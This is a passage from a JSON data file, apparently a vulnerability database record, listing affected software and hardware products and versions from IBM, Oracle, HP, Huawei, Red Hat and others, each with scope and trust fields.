"oracle", "version": null }, { "model": "rational doors web access", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.5" }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.2.2" }, { "model": "rational developer for power systems software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.6" }, { "model": "os image for aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.1.0" }, { "model": "power ps703", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "(7891-73x)0" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.31" }, { "model": "infosphere optim performance manager for db2 on linux", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.1" }, { "model": "lotus expeditor", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.3" }, { "model": "bladecenter -ht", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8750" }, { "model": "tivoli monitoring fixpack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.24" }, { "model": "web experience factory", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "enterprise linux supplementary server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.18" }, { "model": "installation manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.4.1" }, { "model": "emptoris contract management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.50" }, { "model": "rational performance tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2.14" }, { "model": "release control", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.21" }, { "model": "oceanstor s5500t v200r002c10", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.13" }, { "model": "jre update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.76" }, { "model": "jre update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.721" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "system m3 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x365042550" }, { "model": "jrockit r28.1.4", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "emptoris spend analysis", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.0.2.6" }, { "model": "rational software architect design manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37006.1" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "secblade fw (comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5)0" }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2" }, { "model": "smc2.0 v100r002c02", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "installation manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.8.2.1" }, { "model": "cognos controller fp3 if2", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "10.1.1" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.4" }, { "model": "db2 express edition fp6", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "10.5" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.7.8.0" }, { "model": "jdk update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.7.040" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.31" }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "security network controller 1.0.3379m", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "personal communications", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0.8" }, { "model": "rational lifecycle integration adapter", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.2" }, { "model": "jre update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.6.065" }, { "model": "enterprise linux desktop client", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "rational rhapsody design manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.2" }, { "model": "packaging utility", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.8" }, { "model": "optim performance manager for db2 on linux", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.1" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.1.185" }, { "model": "abyp-4ts-p-m", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "jrockit r27.6.6", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "operations agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "11.14" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.11" }, { "model": "rational doors next generation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0" }, { "model": "rational requirements composer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1.1" }, { "model": "spectrum scale", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.1.0" }, { "model": "system storage ts2900 tape librray", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0033" }, { "model": "installation manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.7" }, { "model": "rational software architect for websphere software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1" }, { "model": "netezza platform software 7.0.4.8-p1", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "data ontap", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2" }, { "model": "rational software architect realtime edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "rational sap connector", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0.3" }, { "model": "pureapplication system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.10" }, { "model": "os image for red hat", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.0.1" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37007.4.0.5" }, { "model": "emptoris contract management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.0.2.1" }, { "model": "jrockit r27.6.8", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "rational functional tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6.0.3" }, { "model": "oceanstor s5800t v200r002c20spc200", "scope": "ne", "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "websphere transformation extender", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2.0.4" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.4" }, { "model": "jre update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.71" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.1.2" }, { "model": "netiq sentinel", "scope": "eq", "trust": 0.3, "vendor": "novell", "version": "8.0" }, { "model": "jdk update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.6.065" }, { "model": "operations agent virtual appliance", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "11.13" }, { "model": "4500g (comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5)0" }, { "model": "tivoli monitoring", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.0" }, { "model": "pureapplication system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.11" }, { "model": "websphere ilog jrules", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "tivoli monitoring fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.305" }, { "model": "sterling connect:direct for microsoft windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5.00" }, { "model": "rational performance tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.26" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1" }, { "model": "contactoptimization", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.01" }, { "model": "oceanstor s2600t v200r002c30", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "campaign", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3" }, { "model": "tivoli monitoring", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2" }, { "model": "sametime", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.0.0" }, { "model": "rational software architect for websphere software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.4" }, { "model": "rational rhapsody design manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0" }, { "model": "personal communications", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0.3" }, { "model": "abyp-0t-2s-2l-p", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70007.3.0.10" }, { "model": "jrockit r28.1.5", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.45" }, { "model": "integration bus", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.1.4" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "7" }, { "model": "java", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.2.0" }, { "model": "tivoli endpoint manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.0" }, { "model": "emptoris contract management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.0.13" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.17" }, { "model": "installation manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.7.4" }, { "model": "smc2.0 v100r003c10spc100", "scope": "ne", "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "rational software architect realtime edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "rational developer for system z if3", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "jdk update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.6.037" }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.01" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.5" }, { "model": "packaging utility", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.6.1" }, { "model": "rational team concert ifix3", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.7" }, { "model": "tivoli storage manager client management services", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "flex system chassis management module 2peo12o", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70007.2" }, { "model": "tivoli directory integrator", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.17" }, { "model": "rational software architect design manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.1" }, { "model": "tivoli netcool impact", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "installation manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.7" }, { "model": "systems director", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.2.2" }, { "model": "sametime community server limited use", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9" }, { "model": "powervc standard edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.1.2" }, { "model": "db2\u00ae express edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.7" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.12" }, { "model": "flex system compute node type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x24087370" }, { "model": "system type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x3690x571470" }, { "model": "connect-it", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.60" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.0.0" }, { "model": "buildforge", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.2" }, { "model": "rational developer for power systems software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.31" }, { "model": "content collector for sap applications", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0" }, { "model": "p6000 command view software", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "10.3.1" }, { "model": "notes and domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1.5" }, { "model": "sterling connect:direct browser user interface", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.0.10" }, { "model": "tivoli key lifecycle manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.1" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.31" }, { "model": "sterling control center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.0" }, { "model": "contactoptimization", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "rational collaborative lifecycle management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1.5" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.7" }, { "model": "rational service tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.3.0.1" }, { "model": "s12700 v200r006c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "jrockit r28.2.3", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "jre update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.7.045" }, { "model": "tivoli system automation application manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2" }, { "model": "system m2 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x365041990" }, { "model": "rational synergy", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.6" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "350.30" }, { "model": "jrockit r27.6.4", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "flashcopy manager for oracle with sap environments", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.1.1" }, { "model": "security network controller 1.0.3352m", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "rational functional tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.1.11" }, { "model": "algo one", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.9" }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.2" }, { "model": "flex system manager node types", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "87340" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "jdk update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.6.041" }, { "model": "power", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7500" }, { "model": "sterling connect:direct for openvms", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.4.1" }, { "model": "rational synergy", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.5" }, { "model": "power express", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "560" }, { "model": "websphere datapower xc10 appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "s12700 v200r007c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "tivoli endpoint manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "infosphere information server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "11.3" }, { "model": "rational software architect", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.5.2" }, { "model": "rational developer for system z if3", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.1.12" }, { "model": "smb1910 (comware r1108", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5)" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1" }, { "model": "campaign", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "security appscan standard", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "flex system chassis management module 2pet10e", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "operations manager for windows", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "8.10" }, { "model": "business process monitor", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.02" }, { "model": "rational business developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.1" }, { "model": "algo credit limits", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5.0" }, { "model": "db2\u00ae connect? application server edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1" }, { "model": "powervc standard edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.0.0" }, { "model": "flashcopy manager for oracle", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.0.0" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.13" }, { "model": "smartcloud orchestrator fp1 ifix6", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3" }, { "model": "emptoris spend analysis", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.0.12" }, { "model": "infosphere guardium", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.5" }, { "model": "predictiveinsight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.1" }, { "model": "integration bus", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10" }, { "model": "flashcopy manager for db2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.0.4" }, { "model": "jdk update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.7.045" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.16" }, { "model": "rational requirements composer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1" }, { "model": "power express f/c", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5504667" }, { "model": "emptoris strategic supply management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.0.4" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.0.5" }, { "model": "power express f/c", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5205587" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.22" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "730.80" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.1" }, { "model": "performance manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.20" }, { "model": "jrockit r27.7.6", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "730.50" }, { "model": "asset manager cloudsystem chargeback", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.40" }, { "model": "ds8700", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "76.31.143.0" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5" }, { "model": "db2 connect application server edition fp11", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.7" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.13" }, { "model": "hp-ux web server suite hpuxwsatw406", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "4.06" }, { "model": "websphere process server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2" }, { "model": "db2\u00ae advanced workgroup server edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.5" }, { "model": "rational business developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.15" }, { "model": "tivoli business service manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2" }, { "model": "java sdk sr2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7" }, { "model": "clustered data ontap", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2" }, { "model": "tivoli common reporting", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.1" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37007.3.0.5" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.4" }, { "model": "infosphere optim query workload tuner for db2 for luw", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.0.2" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3" }, { "model": "websphere message broker", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0" }, { "model": "system m4 bd type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x365054660" }, { "model": "rational synergy", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.7" }, { "model": "infosphere optim configuration manager for db2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.1" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.6" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35006.4.19" }, { "model": "abyp-10g-4sr-1-p", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "rational performance tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.25" }, { "model": "initiate master data service provider hub", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.5" }, { "model": "cloud manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.0.1" }, { "model": "vsr (comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7)0" }, { "model": "rational software architect realtime edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.2" }, { "model": "oceanstor s5500t v200r002c20spc200", "scope": "ne", "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "jdk update13", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.7.0" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.4" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.11" }, { "model": "dataquant", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.1" }, { "model": "data ontap", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "8.2.3" }, { "model": "tivoli directory server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2" }, { "model": "oceanstor 18800f v100r001c20", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "rational software architect design manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.6" }, { "model": "cloud manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2" }, { "model": "content collector", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "java", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.12.3" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1.1" }, { "model": "tivoli netcool/omnibus", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3" }, { "model": "rational build forge", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.2" }, { "model": "java se embedded 7u25", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.02" }, { "model": "websphere transformation extender", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.33" }, { "model": "rational software architect design manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.5" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "730.90" }, { "model": "enterprise linux server supplementary", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "java", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0.80" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.6" }, { "model": "emptoris contract management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.0.1.5" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "730.00" }, { "model": "db2\u00ae express edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.5" }, { "model": "oceanstor s5800t v200r002c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "flashcopy manager for oracle with sap environments", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.0" }, { "model": "sparc enterprise m8000 xcp", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1117" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.5" }, { "model": "sterling control center ifix04", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.4.0.1" }, { "model": "rational doors web access", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.5.2" }, { "model": "rational software architect", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.5.5" }, { "model": "jdk update4", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.7.0" }, { "model": "tivoli monitoring", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.3" }, { "model": "rational doors web access", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "6.0.16.3" }, { "model": "infosphere optim query workload tuner for db2 for luw", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.0.1" }, { "model": "jre update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.6.024" }, { "model": "rational functional tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.17" }, { "model": "tivoli storage manager operations center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.4.1000" }, { "model": "systems director storage control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.2.0" }, { "model": "smartcloud provisioning", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.0.5" }, { "model": "rational functional tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1" }, { "model": "tecal e6000 chassis v100r001c00", "scope": "ne", "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "rational software architect for websphere software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.1" }, { "model": "informix genero", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.50" }, { "model": "system type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x3690x571490" }, { "model": "java", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.4.2" }, { "model": "predictiveinsight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.3" }, { "model": "hsr6800 (comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7)0" }, { "model": "jre 1.6.0 33", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "tivoli storage manager administration center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, 